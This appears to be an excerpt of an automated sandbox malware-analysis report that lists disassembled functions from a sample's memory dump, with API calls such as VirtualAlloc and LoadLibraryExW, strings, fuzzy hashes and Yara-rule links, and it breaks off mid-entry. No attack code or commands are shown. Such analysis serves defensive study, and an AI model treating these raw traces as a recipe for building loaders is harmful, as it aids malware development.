                                                                                                                • %08lX-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X, xrefs: 01264447
                                                                                                                • RestartByRestartManager, xrefs: 0126446F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CreateFreeGuidH_prolog3_String
                                                                                                                • String ID: %08lX-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X$RestartByRestartManager
                                                                                                                • API String ID: 1084067465-5890034
                                                                                                                • Opcode ID: 1a7ac36bc311a077111642efbb3d6c05d20a2ef04714ff2c1c59406f39c4d7c8
                                                                                                                • Instruction ID: 24e482aac8c098a4b5efc70626173094f97b330bb91d1a89d2606b0fde48f6fb
                                                                                                                • Opcode Fuzzy Hash: 1a7ac36bc311a077111642efbb3d6c05d20a2ef04714ff2c1c59406f39c4d7c8
                                                                                                                • Instruction Fuzzy Hash: 3E715F7191014AAFCF01EBE8D894EFEBBBDAF69304F1440A8F145A7191DB35AD84DB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127F6CF, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 142COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000104,?,?,?), ref: 0127F70A
                                                                                                                • PathFindExtensionA.KERNELBASE(?,?,?,?), ref: 0127F724
                                                                                                                  • Part of subcall function 0126828F: __CxxThrowException@8.LIBCMT ref: 012682A3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8ExtensionFileFindModuleNamePathThrow
                                                                                                                • String ID: .CHM$.HLP$.INI
                                                                                                                • API String ID: 1938139466-4017452060
                                                                                                                • Opcode ID: f91b14fdfa3d84780bf159d6926cddc03e0961442d1c162468a38b3256494185
                                                                                                                • Instruction ID: 43e0349a71c2a6f07bd648b4c6b12886dbd7653334bea1028186d63ccde69fe7
                                                                                                                • Opcode Fuzzy Hash: f91b14fdfa3d84780bf159d6926cddc03e0961442d1c162468a38b3256494185
                                                                                                                • Instruction Fuzzy Hash: D441C5B19243079FEB24EF78DD44BBBB7ECAF14610F00096AD655D6180EB74D584CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1008023E, Relevance: 7.7, APIs: 5, Instructions: 163COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 1559183368-0
                                                                                                                • Opcode ID: 59c99c49a0f53d05a78ac640d97e234e068a72b68976d54a6c2c1a16bd865897
                                                                                                                • Instruction ID: c8b4c45067b91d0e39c4a9a5feca0d1ca4582558a1bc32c2ce857de4048925bd
                                                                                                                • Opcode Fuzzy Hash: 59c99c49a0f53d05a78ac640d97e234e068a72b68976d54a6c2c1a16bd865897
                                                                                                                • Instruction Fuzzy Hash: 0B518D31E00705EBDBA4CFA9C88469E77E9FF51360F20872BF869962D1D7B19E508B41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01267417, Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 0126741E
                                                                                                                • GlobalLock.KERNEL32 ref: 0126750A
                                                                                                                • DestroyWindow.USER32(?,?,00000028,?,01267285,00000000,?,?,00000028), ref: 012675C1
                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,00000028,?,01267285,00000000,?,?,00000028), ref: 012675D1
                                                                                                                • GlobalFree.KERNEL32 ref: 012675D8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Global$DestroyFreeH_prolog3_catchLockUnlockWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 571947920-0
                                                                                                                • Opcode ID: eed44323b3555cf68d2d266409577d21e105d107f2c9c83b953d8f703c3f4505
                                                                                                                • Instruction ID: 3ef061a21a2b4f29f89c1f4315583f6c0fa495e64cfdf917a17c33c4780bce67
                                                                                                                • Opcode Fuzzy Hash: eed44323b3555cf68d2d266409577d21e105d107f2c9c83b953d8f703c3f4505
                                                                                                                • Instruction Fuzzy Hash: 1051513092024BDFDF15EFB8E888ABE7BB9AF54318F144568E905972D1DB70DA81CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100805A0, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _malloc.LIBCMT ref: 100805AC
                                                                                                                  • Part of subcall function 1007FDFC: __FF_MSGBANNER.LIBCMT ref: 1007FE13
                                                                                                                  • Part of subcall function 1007FDFC: __NMSG_WRITE.LIBCMT ref: 1007FE1A
                                                                                                                  • Part of subcall function 1007FDFC: RtlAllocateHeap.NTDLL(014D0000,00000000,00000001,00000001,?,?,?,1007F6B1,00000001,00000000,?,?,?,1007F5DA,?), ref: 1007FE3F
                                                                                                                • _free.LIBCMT ref: 100805BF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_free_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1020059152-0
                                                                                                                • Opcode ID: 3e3cf100a0ba3bfd7297b495d8e265eef2effc6bdeecaef783f6cfdccac2b72a
                                                                                                                • Instruction ID: bfa19b534a67b3a3bdb8cc6453be5ab9da25dfe1e8a711f6ee41b35b8f43b394
                                                                                                                • Opcode Fuzzy Hash: 3e3cf100a0ba3bfd7297b495d8e265eef2effc6bdeecaef783f6cfdccac2b72a
                                                                                                                • Instruction Fuzzy Hash: 6011E336C00A2AEEDB60DB749C5464A3BD8FF482B0F118527FD489A151EB34D9608FA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127F62E, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PathFindFileNameA.SHLWAPI(00000000,?,0127F750,?,?,00000104), ref: 0127F63A
                                                                                                                • _strlen.LIBCMT ref: 0127F647
                                                                                                                • __cftof.LIBCMT ref: 0127F659
                                                                                                                • SetErrorMode.KERNELBASE(00000000,00000000,?,01296BE5,?,?,?,?,?,?,00000000,?,012837E8,01260000,00000000,00000000), ref: 0127F67F
                                                                                                                • SetErrorMode.KERNELBASE(00000000,?,01296BE5,?,?,?,?,?,?,00000000,?,012837E8,01260000,00000000,00000000), ref: 0127F687
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$FileFindNamePath__cftof_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4036641936-0
                                                                                                                • Opcode ID: 55f389d2cdb7001c80fb90e3595bd0b54ee11413f4cab0ce7c73700b7e6e83c9
                                                                                                                • Instruction ID: c53a1e2930a19a9064f45aec54f3e6ec0b856b83b44290f1515fcbe8b7905cca
                                                                                                                • Opcode Fuzzy Hash: 55f389d2cdb7001c80fb90e3595bd0b54ee11413f4cab0ce7c73700b7e6e83c9
                                                                                                                • Instruction Fuzzy Hash: 5911A37143520AAFDF10BF78D904F6A3B9CAF10224F108459EA28972A1DA36D491CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01269D98, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 240COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _memset
                                                                                                                • String ID: @$AfxFrameOrView120s$AfxMDIFrame120s
                                                                                                                • API String ID: 2102423945-1212219093
                                                                                                                • Opcode ID: 87d470fc5623cda40cb050fc1049a2faa578005196d29c2a99075038bd53a943
                                                                                                                • Instruction ID: 573350e40a2e9773239844aa13343f353768e33aeacb3762395f03e1c6f399dd
                                                                                                                • Opcode Fuzzy Hash: 87d470fc5623cda40cb050fc1049a2faa578005196d29c2a99075038bd53a943
                                                                                                                • Instruction Fuzzy Hash: A0810672D2031EAAEF11DBE8CD85BEEBBFCAB14344F0445659A44F32C0DB7496C88654
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10003454, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 1000345B
                                                                                                                  • Part of subcall function 10080205: __fsopen.LIBCMT ref: 10080210
                                                                                                                • _wprintf.LIBCMT ref: 10003481
                                                                                                                • __fread_nolock.LIBCMT ref: 100034AE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3___fread_nolock__fsopen_wprintf
                                                                                                                • String ID: open failed! file: %s
                                                                                                                • API String ID: 3424707304-3516318216
                                                                                                                • Opcode ID: dd5816e8d9940ff8832c7ceb486bdb2240f834875f9788778b9577eb6b431926
                                                                                                                • Instruction ID: 5a015864f0c5f88b7ef57bbaa6964f32a848b3d2b775e524822b1920f31d1ecd
                                                                                                                • Opcode Fuzzy Hash: dd5816e8d9940ff8832c7ceb486bdb2240f834875f9788778b9577eb6b431926
                                                                                                                • Instruction Fuzzy Hash: FC219575900215AEE715DBA48C82BEFBAB8EF14351F50402EF10577182DFB52A458762
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01264857, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 01285A48: __getptd_noexit.LIBCMT ref: 01285A48
                                                                                                                • __snprintf_s.LIBCMT ref: 0126489A
                                                                                                                  • Part of subcall function 012859F5: __vsnwprintf_s_l.LIBCMT ref: 01285A0A
                                                                                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000060,?,?,?,?,?), ref: 012648E2
                                                                                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,?,?,?), ref: 012648F2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$__getptd_noexit__snprintf_s__vsnwprintf_s_l
                                                                                                                • String ID: LOC
                                                                                                                • API String ID: 1713928595-519433814
                                                                                                                • Opcode ID: 9626198d6e75f7743355ed7549555aeacc4ed4c939f54c2d2893fc6bf0c2511e
                                                                                                                • Instruction ID: 7a9c1ff250a59be09b674899fe66a0e0d263822ec3a8d6234242c282f9e1a1b7
                                                                                                                • Opcode Fuzzy Hash: 9626198d6e75f7743355ed7549555aeacc4ed4c939f54c2d2893fc6bf0c2511e
                                                                                                                • Instruction Fuzzy Hash: 32110D3192135ABBDB10FBB8EC85EED77AC9F15720F4002A5E904671D1DE709D40C790
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10005433, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID: invalid string position$string too long
                                                                                                                • API String ID: 4104443479-4289949731
                                                                                                                • Opcode ID: a5ded62496ab0ae3e4e6fb38c64aa3dae7e88693d2d624daa75178a3fb51effb
                                                                                                                • Instruction ID: 43b8d5935dd303edff2cdee07e157925a093b014dd17f2c22556cee1c643785d
                                                                                                                • Opcode Fuzzy Hash: a5ded62496ab0ae3e4e6fb38c64aa3dae7e88693d2d624daa75178a3fb51effb
                                                                                                                • Instruction Fuzzy Hash: 671193353017059BEB24CFADDC80A9BBBA9EF4529AB10092DF956CB785C771EC84C790
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126392B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 01263935
                                                                                                                  • Part of subcall function 012633C1: __EH_prolog3.LIBCMT ref: 012633C8
                                                                                                                • _memset.LIBCMT ref: 01263976
                                                                                                                  • Part of subcall function 01270E9F: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,?,00000108,01264142,?,?), ref: 01270ED2
                                                                                                                  • Part of subcall function 01270E9F: GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 01270EE2
                                                                                                                  • Part of subcall function 01270E9F: RtlEncodePointer.NTDLL(00000000,?,?,?,00000108,01264142,?,?), ref: 01270EEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressEncodeH_prolog3H_prolog3_HandleModulePointerProc_memset
                                                                                                                • String ID: y
                                                                                                                • API String ID: 1475827419-4225443349
                                                                                                                • Opcode ID: 59f3c442aa0f5f862021a00d9943c641b51d82388dafd30b08e182804985a792
                                                                                                                • Instruction ID: 04e73cd6f87fe066bc2bdaa93413d183ba45510efe042fda914ce1341eca8b47
                                                                                                                • Opcode Fuzzy Hash: 59f3c442aa0f5f862021a00d9943c641b51d82388dafd30b08e182804985a792
                                                                                                                • Instruction Fuzzy Hash: F5213E72C2112A9BDB25EB64CC40BEDB37CAF24310F0041C5A698A72C0DBB09ED4CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012640E4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 01264108
                                                                                                                • PathFindExtensionA.SHLWAPI(?), ref: 0126411E
                                                                                                                  • Part of subcall function 0126392B: __EH_prolog3_GS.LIBCMT ref: 01263935
                                                                                                                  • Part of subcall function 0126392B: _memset.LIBCMT ref: 01263976
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ExtensionFileFindH_prolog3_ModuleNamePath_memset
                                                                                                                • String ID: %s%s.dll
                                                                                                                • API String ID: 2421924478-1649984862
                                                                                                                • Opcode ID: 2ce90578a02696fe9e3614426f97239ddba8359e0bdf2d2f615b96ceec57254f
                                                                                                                • Instruction ID: 0013520f0dbee964ed4cc1cb4d67aaa874ab622ec9e3f75dfc1a8067be5773fa
                                                                                                                • Opcode Fuzzy Hash: 2ce90578a02696fe9e3614426f97239ddba8359e0bdf2d2f615b96ceec57254f
                                                                                                                • Instruction Fuzzy Hash: CB01A471A2015D9BDB20EF68DC45AEF77FCFF19B10F4004E6AA04D7140EA719A84CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01261D20, Relevance: 4.6, APIs: 3, Instructions: 149memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 01261DC9
                                                                                                                • VirtualAlloc.KERNELBASE(000000FF,012617AA,00001000,00000004,00000000,?,012AB8F0,0126237B,00000000,00000000), ref: 01261DF9
                                                                                                                • _memmove.LIBCMT ref: 01261E0A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual_memmove_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1810048036-0
                                                                                                                • Opcode ID: 8df7ac50f8e2b3df6a5aeac32becf3b9fd626cadd341de6cf96145b5a31c128c
                                                                                                                • Instruction ID: c9025bbca5fc14f46877a01f322a8fb5b8b6c14f6e5d5d3a8f3f6e0388a46626
                                                                                                                • Opcode Fuzzy Hash: 8df7ac50f8e2b3df6a5aeac32becf3b9fd626cadd341de6cf96145b5a31c128c
                                                                                                                • Instruction Fuzzy Hash: 7E21E271A11205AFCB24DB5DDC80A6AB3A9EF8A754F504158FA08D7381E3B0FCA0C790
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01261A20, Relevance: 4.6, APIs: 3, Instructions: 84COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindResourceW.KERNELBASE(00000000,?,00000006,?,00000010,?,?,0127EF83,00000000,00000001,00000001,00000000,00000004,0127EF49,00000000,00000001), ref: 01261A3B
                                                                                                                  • Part of subcall function 01261540: LoadResource.KERNEL32(01267FF5,?,?,01267FF5,?,01267FF5,00000000), ref: 01261549
                                                                                                                • WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,?,00000000,00000000,00000000,00000000), ref: 01261A6E
                                                                                                                • WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 01261AA8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiResourceWide$FindLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 861045882-0
                                                                                                                • Opcode ID: 67ad63ed1d87e4c62cd4ab370af81d050fb310f2d1b49aa0020d96f949f84ea3
                                                                                                                • Instruction ID: 3c84e5a9d0e555fb30bc3b3b8ef46003bb7291fd248444071f114e5538836de1
                                                                                                                • Opcode Fuzzy Hash: 67ad63ed1d87e4c62cd4ab370af81d050fb310f2d1b49aa0020d96f949f84ea3
                                                                                                                • Instruction Fuzzy Hash: A9219372650215AFE7249A59DC89F7AB79CEB54710F14005AFB05DF2C4D6A1BC90C7A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01264751, Relevance: 4.6, APIs: 3, Instructions: 75libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 01270E2E: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0126477D,?,00000003,?,00000004,?,00000000), ref: 01270E40
                                                                                                                  • Part of subcall function 01270E2E: GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 01270E50
                                                                                                                  • Part of subcall function 01270E2E: EncodePointer.KERNEL32(00000000,?,0126477D,?,00000003,?,00000004,?,00000000), ref: 01270E59
                                                                                                                  • Part of subcall function 01270E2E: GetLocaleInfoEx.KERNELBASE(?,00000004,?,00000003,?,0126477D,?,00000003,?,00000004,?,00000000), ref: 01270E7F
                                                                                                                  • Part of subcall function 01285A48: __getptd_noexit.LIBCMT ref: 01285A48
                                                                                                                • __snprintf_s.LIBCMT ref: 012647AF
                                                                                                                  • Part of subcall function 012859F5: __vsnwprintf_s_l.LIBCMT ref: 01285A0A
                                                                                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000060,?,?,?,?,?,?,?,?,00000000), ref: 012647F8
                                                                                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,?,?,?,?,?,?,00000000), ref: 01264808
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
